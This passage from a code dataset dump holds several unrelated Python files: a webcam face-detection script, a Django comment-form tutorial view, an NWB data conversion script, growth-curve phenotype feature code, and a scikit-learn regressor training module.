cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_eye_tree_eyeglasses.xml\")\r\n'''\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # Getting corners around the face\r\n faces = faceCascade.detectMultiScale(imgGray, 1.3, 1) # 1.3 = scale factor, 5 = minimum neighbor\r\n # drawing bounding box around face\r\n for (x, y, w, h) in faces:\r\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3)\r\n\r\n \r\n \r\n eyes = eyeCascade.detectMultiScale(imgGray)\r\n \r\n for (ex, ey, ew, eh) in eyes:\r\n img = cv2.rectangle(img, (ex, ey), (ex+ew, ey+eh), (255, 0, 0), 3)\r\n # draw text on the image\r\n output = img.copy()\r\n cv2.putText(output, \"vineeshathoutam\", (75, 75), \r\n\t cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\r\n cv2.imshow(\"Text\", output)\r\n\r\n \r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyWindow('face_detect')","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"487441065","text":"\n\nfrom xai.brain.wordbase.nouns._sergeant import _SERGEANT\n\n#calss header\nclass _SERGEANTS(_SERGEANT, ):\n\tdef __init__(self,): \n\t\t_SERGEANT.__init__(self)\n\t\tself.name = \"SERGEANTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"sergeant\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sergeants.py","file_name":"_sergeants.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16081556","text":"# STEP 2:\n# Let's add the comment form to our post view. If we create it\n# in the view, we can add it to that view's context dictionary,\n# which will allow us to pass it along to the template to be\n# rendered. \n\n# Rememeber to import the `redirect` shortcut on the line below, along with `render`\nfrom django.shortcuts import render, redirect\nfrom post.models import Post\n# Import the new form here:\nfrom post.forms import CommentForm\n\n\ndef index(request):\n # let's show all the posts, with newest first\n posts = Post.objects.all().order_by('-published')\n context = {'posts': posts}\n return render(request, 'index.html', context)\n\n\ndef post(request, post_id):\n post = Post.objects.get(id=post_id)\n\n # Instantiate the CommentForm class here. At this\n # point in our workflow, the user has already made\n # a request to view, so we know what the post_id\n # is that they are viewing. Since our Comment Model\n # (and likewise, the Comment ModelForm) are tied to \n # a specific Post pk, we can just pass in that pk\n # to our form (this means the user won't have to\n # select the post they want to comment on from\n # a dropdown.)\n form = CommentForm(initial={'post': post.pk})\n \n # Remember how I said we have access to everything\n # about the request in the view? Well this comes in\n # handy when dealing with forms! When you make a GET\n # request to a post URL, we load the form. If you submit\n # the form via a POST, we can use this if condition to\n # reinitialize our CommentForm with the data from the POST\n # (IE, the comment text).\n if request.method == \"POST\":\n # At this point in the workflow,\n # we are dealing with a bound form. A bound form has\n # data associated with it. \n form = CommentForm(request.POST)\n # Next, Django makes it REALLY easy to check if our form is\n # valid. By calling form.is_valid(), we know if the form was\n # submitted correctly, or if it should be rerendered with\n # the appropriate errors (for example, if you didn't\n # submit the form with all of the required fields filled in) \n if form.is_valid():\n # remember, a bound, valid ModelForm is just a model instance\n # ready to be saved to the database! Rememeber when we called\n # post.save() in the shell and the post was committed to the\n # database? That's exactly what we're doing here.\n form.save()\n # Finally, let's redirect the user back to the post they were just on.\n return redirect('/post/{}/'.format(post_id))\n\n # Woa, what's this \"comment_set\" nonsense? It's a helper method Django gives\n # us that allows us to grab the _set_ of _comments_ associated to a post!\n # It's the same as using \"Comment.objects.filter(post=post)\"\n # \n # https://docs.djangoproject.com/en/dev/topics/db/queries/#following-relationships-backward\n comments = post.comment_set.all() \n\n # Finally, here is our updated context! \n # Along with post, we're passing in `form` and `comments`\n context = {'post': post, 'form': form, 'comments': comments}\n return render(request, 'post.html', context)\n\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"49483251","text":"from csv import reader, writer\nfrom pathlib import Path\n\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom oneibl.one import ONE\nfrom pynwb import NWBHDF5IO\nfrom tqdm import tqdm\n\nfrom ibl_to_nwb.AlyxToNWB.alyx_to_nwb_converter import Alyx2NWBConverter\nfrom ibl_to_nwb.AlyxToNWB.alyx_to_nwb_metadata import Alyx2NWBMetadata\n\nwith open(r\"path-to-csv.csv\", \"r\") as io:\n eid_list = [row[0] for row in reader(io)]\none = ONE()\ndir = Path.cwd()\nmetadata_errors = dir / f\"metadata_errors.csv\"\nconverter_errors = dir / f\"converter_errors.csv\"\n\n\ndef converter(eid, no):\n fileloc = dir / f\"beh_eid_{eid}.json\"\n nwb_saveloc = dir / f\"beh_eid_{eid}.nwb\"\n print(no)\n if not Path(fileloc).is_file():\n try:\n converter_metadata = Alyx2NWBMetadata(eid=eid, one_obj=one)\n converter_metadata.write_metadata(fileloc)\n except Exception as e:\n print(f\"could not convert metadata for {eid}\\n {str(e)}\")\n with open(metadata_errors, \"a+\", newline=\"\") as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n csv_writer.writerow([eid, str(e)])\n return\n\n if not Path(nwb_saveloc).is_file():\n try:\n converter_nwb = Alyx2NWBConverter(\n one_object=one, nwb_metadata_file=fileloc, saveloc=nwb_saveloc, save_raw=False\n )\n\n execute_list = [\n converter_nwb.create_stimulus,\n converter_nwb.create_trials,\n converter_nwb.create_behavior,\n converter_nwb.create_probes,\n converter_nwb.create_iblsubject,\n converter_nwb.create_lab_meta_data,\n converter_nwb.create_acquisition,\n ]\n t = tqdm(execute_list)\n for i in t:\n t.set_postfix(current=f\"creating nwb \" + i.__name__.split(\"_\")[-1])\n i()\n print(\"done converting\")\n\n converter_nwb.write_nwb()\n except Exception as e:\n print(f\"could not convert for {eid}, {e}\")\n with open(converter_errors, \"a+\", newline=\"\") as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n csv_writer.writerow([eid, str(e)])\n\n\nParallel(n_jobs=20)(delayed(converter)(eid, no) for no, eid in enumerate(eid_list))\n","sub_path":"ibl_to_nwb/old_conversion/conversion_scripts/create_nwb_behavior.py","file_name":"create_nwb_behavior.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"260262812","text":"import numpy as np\nfrom enum import Enum\n\nfrom scanomatic.data_processing import growth_phenotypes\nfrom scanomatic.io.logger import Logger\nfrom scanomatic.data_processing.phases.analysis import CurvePhasePhenotypes\nfrom scanomatic.data_processing.phases.segmentation import CurvePhases, is_detected_non_linear\n\n_l = Logger(\"Curve Phase Meta Phenotyping\")\n\n\nclass CurvePhaseMetaPhenotypes(Enum):\n \"\"\"Phenotypes of an entire growth-curve based on the phase segmentation.\n\n Attributes:\n CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution:\n The fraction of the total yield (in population doublings) that the\n `CurvePhases.Impulse` that contribute most to the total yield is\n responsible for (`CurvePhasePhenotypes.FractionYield`).\n\n CurvePhaseMetaPhenotypes.FirstMinorImpulseYieldContribution:\n As with `CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution`\n but for the second most important `CurvePhases.Impulse`\n\n CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime:\n The `CurvePhases.Impulse` that contribute most to the\n total yield, its average population doubling time\n (`CurvePhasePhenotypes.PopulationDoublingTime`).\n\n CurvePhaseMetaPhenotypes.FirstMinorImpulseAveragePopulationDoublingTime:\n The average population doubling time of\n the second most contributing `CurvePhases.Impulse`\n\n CurvePhaseMetaPhenotypes.MajorImpulseFlankAsymmetry:\n The `CurvePhasePhenotypes.AsymptoteAngle` ratio of the right\n to left flanking non-linear phase.\n\n CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteAngle:\n The `CurvePhasePhenotypes.AsymptoteAngle` of the first `CurvePhases.Acceleration`\n CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteAngle:\n The `CurvePhasePhenotypes.AsymptoteAngle` of the last `CurvePhases.Retardation`\n CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteIntersect:\n The `CurvePhasePhenotypes.AsymptoteIntersection` of the first `CurvePhases.Acceleration`\n CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteIntersect:\n The `CurvePhasePhenotypes.AsymptoteIntersection` of the last `CurvePhases.Retardation`\n\n CurvePhaseMetaPhenotypes.InitialLag:\n The intercept time of the linear model of the first `CurvePhases.Flat` and the first\n `CurvePhases.Impulse`. Note that this does not have to be the major impulse in the above\n measurements.\n CurvePhaseMetaPhenotypes.ExperimentDoublings:\n (Not implemented) Total doublings\n CurvePhaseMetaPhenotypes.Modalities:\n The number of `CurvePhases.Impulse`\n CurvePhaseMetaPhenotypes.Collapses:\n The number of `CurvePhases.Collapse`\n\n CurvePhaseMetaPhenotypes.ResidualGrowth:\n (Not implemented) Classifying the growth that happens after the last `CurvePhases.Impulse`.\n\n See Also:\n filter_plate: Get one of these out of a plate of phase segmentation information\n \"\"\"\n MajorImpulseYieldContribution = 0\n FirstMinorImpulseYieldContribution = 1\n MajorImpulseAveragePopulationDoublingTime = 5\n FirstMinorImpulseAveragePopulationDoublingTime = 6\n MajorImpulseFlankAsymmetry = 8\n\n InitialAccelerationAsymptoteAngle = 10\n FinalRetardationAsymptoteAngle = 11\n InitialAccelerationAsymptoteIntersect = 15\n FinalRetardationAsymptoteIntersect = 16\n\n InitialLag = 20\n InitialLagAlternativeModel = 22\n\n ExperimentDoublings = 21\n\n Modalities = 25\n ModalitiesAlternativeModel = 27\n\n Collapses = 26\n\n ResidualGrowth = 30\n\n\nclass VectorPhenotypes(Enum):\n \"\"\"The vector type phenotypes used to store phase segmentation\n\n Attributes:\n VectorPhenotypes.PhasesClassifications:\n 1D vector the same length as growth data with the `CurvePhases` values\n for classification of which phase each population size measurement in the growth data\n is classified as.\n VectorPhenotypes.PhasesPhenotypes:\n 1D vector of `CurvePhasePhenotypes` keyed dicts for each segment in the curve.\n \"\"\"\n PhasesClassifications = 0\n \"\"\":type : VectorPhenotypes\"\"\"\n PhasesPhenotypes = 1\n \"\"\":type : VectorPhenotypes\"\"\"\n\n\ndef filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) == 1,\n phase_selector=lambda phases: phases[0]):\n\n def f(phenotype_vector):\n phases = tuple(d for t, d in phenotype_vector if t == phase)\n if phases_requirement(phases):\n return phase_selector(phases)[measure]\n return np.nan\n\n return np.ma.masked_invalid(np.frompyfunc(f, 1, 1)(plate).astype(np.float))\n\n\ndef filter_plate_on_phase_id(plate, phases_id, measure):\n\n def f(phenotype_vector, phase_id):\n if phase_id < 0:\n return np.nan\n\n try:\n return phenotype_vector[phase_id][1][measure]\n except (KeyError, TypeError):\n return np.nan\n\n return np.ma.masked_invalid(np.frompyfunc(f, 2, 1)(plate, phases_id).astype(np.float))\n\n\ndef _get_phase_id(plate, *phases):\n\n l = len(phases)\n\n def f(v):\n v = zip(*v)[0]\n i = 0\n for id_phase, phase in enumerate(v):\n if i < l:\n if phase is phases[i]:\n i += 1\n if i == l:\n return id_phase\n\n return -1\n\n return np.frompyfunc(f, 1, 1)(plate).astype(np.int)\n\n\ndef _phase_finder(phase_vector, phase):\n\n if phase_vector:\n return tuple(i for i, (p_type, p_data) in enumerate(phase_vector) if p_type == phase)\n return tuple()\n\n# REGION: Phase counters\n\n\ndef _py_impulse_counter(phase_vector):\n if phase_vector:\n return sum(1 for phase in phase_vector if phase[0] == CurvePhases.Impulse)\n return -1\n\n_np_impulse_counter = np.frompyfunc(_py_impulse_counter, 1, 1)\n\n\ndef _np_ma_impulse_counter(phases):\n\n return np.ma.masked_less(_np_impulse_counter(phases), 0)\n\n\ndef _py_inner_impulse_counter(phase_vector):\n\n if phase_vector:\n acc = _phase_finder(phase_vector, CurvePhases.GrowthAcceleration)\n if not acc:\n return -1\n ret = _phase_finder(phase_vector, CurvePhases.GrowthRetardation)\n if not ret:\n return -1\n return _py_impulse_counter(phase_vector[acc[0]: ret[-1]])\n\n return -1\n\n_np_inner_impulse_counter = np.frompyfunc(_py_inner_impulse_counter, 1, 1)\n\n\ndef _np_ma_inner_impulse_counter(phases):\n\n return np.ma.masked_less(_np_inner_impulse_counter(phases), 0)\n\n\ndef _py_collapse_counter(phase_vector):\n if phase_vector:\n return sum(1 for phase in phase_vector if phase[0] == CurvePhases.Collapse)\n return -1\n\n_np_collapse_counter = np.frompyfunc(_py_collapse_counter, 1, 1)\n\n\ndef _np_ma_collapse_counter(phases):\n\n return np.ma.masked_less(_np_collapse_counter(phases), 0)\n\n# END REGION: Phase counters\n\n# REGION: Major pulse index\n\n\ndef _py_get_major_impulse_for_plate(phases):\n \"\"\"Locates major impulses\n\n First the phases sort order based on yield is constructed\n\n The indices and sort order of those that are impulses are\n collected.\n\n Then the original index of the phase with the highest\n sort order is returned.\n\n Args:\n phases: Plate of phase data\n\n Returns: 2D numpy.ma.masked_array with indices of the major\n growth impulses in the vectors.\n \"\"\"\n\n sort_order = np.argsort(tuple(\n p_data[CurvePhasePhenotypes.FractionYield] if\n p_data is not None and p_data[CurvePhasePhenotypes.FractionYield] else -np.inf for p_type, p_data in phases))\n\n impulses = np.array(tuple(\n (i, v) for i, v in enumerate(sort_order) if\n phases[i][VectorPhenotypes.PhasesClassifications.value] == CurvePhases.Impulse))\n\n if impulses.any():\n return impulses[np.argmax(impulses[:, -1])][0]\n return -1\n\n_np_get_major_impulse_for_plate = np.frompyfunc(_py_get_major_impulse_for_plate, 1, 1)\n\n\ndef _np_ma_get_major_impulse_indices(phases):\n\n return np.ma.masked_less(_np_get_major_impulse_for_plate(phases), 0)\n\n# END REGION: Major pulse index\n\n\ndef _py_get_flanking_angle_relation(phases, major_impulse_index, masked):\n\n def _flank_angle(flank, impulse):\n\n if flank is None:\n\n return np.arctan2(1,\n impulse[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope])\n\n elif flank[VectorPhenotypes.PhasesClassifications.value] is CurvePhases.Flat:\n\n return np.pi - np.abs(\n np.arctan2(1, impulse[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope]) -\n np.arctan2(1, flank[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.LinearModelSlope]))\n\n elif is_detected_non_linear(flank[VectorPhenotypes.PhasesClassifications.value]):\n\n return flank[VectorPhenotypes.PhasesPhenotypes.value][CurvePhasePhenotypes.AsymptoteAngle]\n\n else:\n return np.inf\n\n if masked or \\\n phases[major_impulse_index][VectorPhenotypes.PhasesPhenotypes.value] is None:\n return np.inf\n if phases[major_impulse_index][VectorPhenotypes.PhasesClassifications.value] is not CurvePhases.Impulse:\n _l.error(\"Got index {0} as Impulse but is {1} in {2}\".format(\n major_impulse_index,\n phases[major_impulse_index][VectorPhenotypes.PhasesClassifications.value],\n phases))\n return np.inf\n\n a1 = _flank_angle(phases[major_impulse_index - 1] if major_impulse_index > 0 else None,\n phases[major_impulse_index])\n\n a2 = _flank_angle(phases[major_impulse_index + 1] if major_impulse_index < len(phases) - 1 else None,\n phases[major_impulse_index])\n\n return a2 / a1\n\n_np_get_flanking_angle_relation = np.frompyfunc(_py_get_flanking_angle_relation, 3, 1)\n\n\ndef extract_phenotypes(plate, meta_phenotype, phenotypes):\n\n if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution or \\\n meta_phenotype == CurvePhaseMetaPhenotypes.FirstMinorImpulseYieldContribution:\n\n index = -1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution else -2\n phase_need = 1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseYieldContribution else 2\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.FractionYield,\n phases_requirement=lambda phases: len(phases) >= phase_need,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[index]])\n\n elif (meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime or\n meta_phenotype == CurvePhaseMetaPhenotypes.FirstMinorImpulseAveragePopulationDoublingTime):\n\n index = -1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime else -2\n phase_need = 1 if meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseAveragePopulationDoublingTime else 2\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.PopulationDoublingTime,\n phases_requirement=lambda phases: len(phases) >= phase_need,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[index]])\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialLag:\n\n flat_slope = filter_plate_custom_filter(\n plate, phase=CurvePhases.Flat, measure=CurvePhasePhenotypes.LinearModelSlope,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0])\n\n flat_intercept = filter_plate_custom_filter(\n plate, phase=CurvePhases.Flat, measure=CurvePhasePhenotypes.LinearModelIntercept,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0])\n\n # TODO: Consider using major phase\n impulses_phase = _get_phase_id(plate, CurvePhases.Flat, CurvePhases.Impulse)\n\n impulse_slope = filter_plate_on_phase_id(\n plate, impulses_phase, measure=CurvePhasePhenotypes.LinearModelSlope)\n\n impulse_intercept = filter_plate_on_phase_id(\n plate, impulses_phase, measure=CurvePhasePhenotypes.LinearModelIntercept)\n\n lag = (impulse_intercept - flat_intercept) / (flat_slope - impulse_slope)\n lag[lag < 0] = np.nan\n return np.ma.masked_invalid(lag)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialLagAlternativeModel:\n\n impulse_slope = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.LinearModelSlope,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n impulse_intercept = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.LinearModelIntercept,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n impulse_start = filter_plate_custom_filter(\n plate,\n phase=CurvePhases.Impulse,\n measure=CurvePhasePhenotypes.Start,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases:\n phases[np.argsort(tuple(\n phase[CurvePhasePhenotypes.FractionYield] if\n phase[CurvePhasePhenotypes.FractionYield] else -np.inf for phase in phases))[-1]])\n\n flat_slope = 0\n flat_intercept = phenotypes[..., growth_phenotypes.Phenotypes.ExperimentLowPoint.value]\n low_point_time = phenotypes[..., growth_phenotypes.Phenotypes.ExperimentLowPointWhen.value]\n\n lag = (impulse_intercept - np.log2(flat_intercept)) / (flat_slope - impulse_slope)\n\n lag[(lag < 0) | (impulse_start < low_point_time)] = np.nan\n\n return np.ma.masked_invalid(lag)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteAngle:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteAngle,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteAngle:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthRetardation,\n measure=CurvePhasePhenotypes.AsymptoteAngle,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[-1]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.InitialAccelerationAsymptoteIntersect:\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthAcceleration,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[0]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.FinalRetardationAsymptoteIntersect:\n\n return filter_plate_custom_filter(\n plate,\n phase=CurvePhases.GrowthRetardation,\n measure=CurvePhasePhenotypes.AsymptoteIntersection,\n phases_requirement=lambda phases: len(phases) > 0,\n phase_selector=lambda phases: phases[-1]\n )\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.Modalities:\n\n return _np_ma_impulse_counter(plate)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.ModalitiesAlternativeModel:\n\n return _np_ma_inner_impulse_counter(plate)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.Collapses:\n\n return _np_ma_collapse_counter(plate)\n\n elif meta_phenotype == CurvePhaseMetaPhenotypes.MajorImpulseFlankAsymmetry:\n\n indices = _np_ma_get_major_impulse_indices(plate)\n return np.ma.masked_invalid(\n _np_get_flanking_angle_relation(plate, indices.data, indices.mask).astype(np.float))\n\n else:\n\n return np.ma.masked_invalid(np.ones_like(plate.shape) * np.nan)\n","sub_path":"scanomatic/data_processing/phases/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486876282","text":"'''\nthis file deals with data analysis\n'''\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.linear_model import LinearRegression\nimport math\nimport sys\nfrom sklearn.model_selection import cross_val_score,cross_val_predict\nfrom sklearn.externals import joblib\nfrom enum import Enum\nfrom .models import collection_update_with_set, read_mongo_guaranteed\nimport time\n\n##############################################################\n# MACHINE LEARNING\n##############################################################\n\n\nclass Regressor(Enum):\n SIMPLE_REG = 0\n DECISION_TREE_REG = 1\n RANDOM_FOREST_REG = 2\n SVR_REG = 3\n\n\nsel_reg_enum = Regressor.SIMPLE_REG # Currently selected regressor TODO: maybe store in another file\nregressors_chart_data = [0, 0, 0, 0] # Points for graph showing performance of regressors\nregressors_table_data = [0, 0, 0, 0] # AUC scores showing performance of regressors\nz_scores_ref = [dict(), dict(), dict(), dict()] # Reference Z-scores\nregressors = [LinearRegression(), # List of available regressors\n DecisionTreeRegressor(random_state=0),\n RandomForestRegressor(n_estimators=10, random_state=0),\n SVR(kernel='rbf')]\n\n\n#######################################\n# GETTERS / SETTERS\n#######################################\n\n\ndef set_regressor(reg_enum):\n \"\"\" Sets current regressor \"\"\"\n global sel_reg_enum\n sel_reg_enum = Regressor(reg_enum)\n\n\ndef get_ref_z_scores(reg_enum):\n \"\"\" Return reference Z-scores based on enum value.\"\"\"\n global z_scores_ref\n return z_scores_ref[reg_enum.value]\n\n\ndef get_reg_chart_data():\n \"\"\" Return regressors chart data \"\"\"\n global regressors_chart_data\n return regressors_chart_data\n\n\ndef get_auc_scores():\n \"\"\" Return regressors AUC scores \"\"\"\n global regressors_table_data\n return regressors_table_data\n\n\ndef get_reg_z_scores():\n \"\"\" Return regressors reference Z-scores \"\"\"\n global z_scores_ref\n return z_scores_ref\n\n\ndef get_current_z_scores():\n \"\"\" Return current Z-scores \"\"\"\n global sel_reg_enum\n return z_scores_ref[sel_reg_enum.value]\n\n\n#######################################\n# END: GETTERS / SETTERS\n#######################################\n\n\n#######################################\n# SAVE AND LOAD REGRESSORS\n#######################################\n\n\ndef write_xy_to_csv_file(list_xy, file_name):\n \"\"\" Writes list of tuples to CSV file \"\"\"\n file = open(file_name, 'w')\n file.write(\"X,Y\\n\")\n for i in range(0, len(list_xy)):\n file.write(str(list_xy[i][0]) + \",\" + str(list_xy[i][1]) + \"\\n\")\n file.close()\n\n\ndef save_all_regressors():\n \"\"\" Save all trained regressors and testing values to hard drive\"\"\"\n global regressors\n global regressors_chart_data\n global regressors_table_data\n\n # Save regressors\n joblib.dump(regressors[Regressor.SIMPLE_REG.value], 'simple_reg.pkl')\n joblib.dump(regressors[Regressor.DECISION_TREE_REG.value], 'dt_reg.pkl')\n joblib.dump(regressors[Regressor.RANDOM_FOREST_REG.value], 'rf_reg.pkl')\n joblib.dump(regressors[Regressor.SVR_REG.value], 'svr_reg.pkl')\n\n # Save testing values of regressors\n write_xy_to_csv_file(regressors_chart_data[Regressor.SIMPLE_REG.value], \"data_simple_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.DECISION_TREE_REG.value], \"data_dt_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.RANDOM_FOREST_REG.value], \"data_rf_reg.csv\")\n write_xy_to_csv_file(regressors_chart_data[Regressor.SVR_REG.value], \"data_svr_reg.csv\")\n file = open(\"regressors_aucs.csv\", 'w')\n file.write(str(regressors_table_data[Regressor.SIMPLE_REG.value]) + \",\" + str(regressors_table_data[Regressor.DECISION_TREE_REG.value]) + \",\" +\n str(regressors_table_data[Regressor.RANDOM_FOREST_REG.value]) + \",\" + str(regressors_table_data[Regressor.SVR_REG.value]))\n file.close()\n file = open(\"z_scores.csv\", 'w')\n for i in range(0, len(z_scores_ref)):\n comma = \"\"\n for j in range(0, len(z_scores_ref[i][\"Ref. Z-scores\"])):\n file.write(comma + str(z_scores_ref[i][\"Ref. Z-scores\"][j]))\n comma = \",\"\n file.write(\"\\n\")\n file.close()\n return 1\n\n\ndef load_all_regressors():\n \"\"\" Load all previously saved regressors from hard drive\"\"\"\n global training_done\n global regressors\n global regressors_chart_data\n global regressors_table_data\n global z_scores_ref\n try:\n regressors[Regressor.SIMPLE_REG.value] = joblib.load('simple_reg.pkl')\n regressors[Regressor.DECISION_TREE_REG.value] = joblib.load('dt_reg.pkl')\n regressors[Regressor.RANDOM_FOREST_REG.value] = joblib.load('rf_reg.pkl')\n regressors[Regressor.SVR_REG.value] = joblib.load('svr_reg.pkl')\n\n simple_data = pd.read_csv(\"data_simple_reg.csv\")\n regressors_chart_data[Regressor.SIMPLE_REG.value] = (np.array(simple_data)).tolist()\n dt_data = pd.read_csv(\"data_dt_reg.csv\")\n regressors_chart_data[Regressor.DECISION_TREE_REG.value] = (np.array(dt_data)).tolist()\n rf_data = pd.read_csv(\"data_rf_reg.csv\")\n regressors_chart_data[Regressor.RANDOM_FOREST_REG.value] = (np.array(rf_data)).tolist()\n svr_data = pd.read_csv(\"data_svr_reg.csv\")\n regressors_chart_data[Regressor.SVR_REG.value] = (np.array(svr_data)).tolist()\n\n auc_data = pd.read_csv(\"regressors_aucs.csv\", header=None)\n z_scores = pd.read_csv(\"z_scores.csv\", header=None)\n\n z_scores_list = (np.array(z_scores)).tolist()\n for i in range(0, len(z_scores_list)):\n z_scores_ref[i][\"BS\"] = get_cell_ids()\n z_scores_ref[i][\"Ref. Z-scores\"] = z_scores_list[i]\n\n regressors_table_data[Regressor.SIMPLE_REG.value] = auc_data.iloc[0][0]\n regressors_table_data[Regressor.DECISION_TREE_REG.value] = auc_data.iloc[0][1]\n regressors_table_data[Regressor.RANDOM_FOREST_REG.value] = auc_data.iloc[0][2]\n regressors_table_data[Regressor.SVR_REG.value] = auc_data.iloc[0][3]\n\n training_done = True\n\n return 1\n except: # Files not found..\n return 0\n\n\n#######################################\n# END: SAVE AND LOAD REGRESSORS\n#######################################\n\n\n#######################################\n# TRAIN AND TEST OF REGRESSORS\n#######################################\n\ndef train_all_regressors(x_train, y_train):\n global regressors\n for reg in regressors:\n reg.fit(x_train, y_train)\n\n\ndef test_regressor(reg_enum, test_data, correct_answers):\n \"\"\" Test regressor with test set and correct answers\n Updates regression chart_data and regression table_data accordingly \"\"\"\n global regressors_chart_data\n global regressors_table_data\n global regressors\n predictions = cross_val_predict(regressors[reg_enum.value], test_data, correct_answers, cv=6)\n false_positive_rate, true_positive_rate, thresholds = roc_curve(correct_answers, predictions)\n\n regressors_chart_data[reg_enum.value] = list(zip(false_positive_rate, true_positive_rate))\n regressors_table_data[reg_enum.value] = auc(false_positive_rate, true_positive_rate)\n\n\ndef train_and_test_all_regressions(array_x, array_y):\n \"\"\" Train and test each regressor. Get points and auc values for each classifier \"\"\"\n global training_done\n x_train, x_test, y_train, y_test = train_test_split(array_x, array_y, test_size=0.2, random_state=7)\n\n # Train all regressors\n train_all_regressors(x_train=x_train, y_train=y_train)\n\n # Test all regressors\n test_regressor(Regressor.SIMPLE_REG, x_test, y_test)\n test_regressor(Regressor.DECISION_TREE_REG, x_test, y_test)\n test_regressor(Regressor.RANDOM_FOREST_REG, x_test, y_test)\n test_regressor(Regressor.SVR_REG, x_test, y_test)\n\n training_done = True\n\n\n#######################################\n# END: TRAIN AND TEST OF 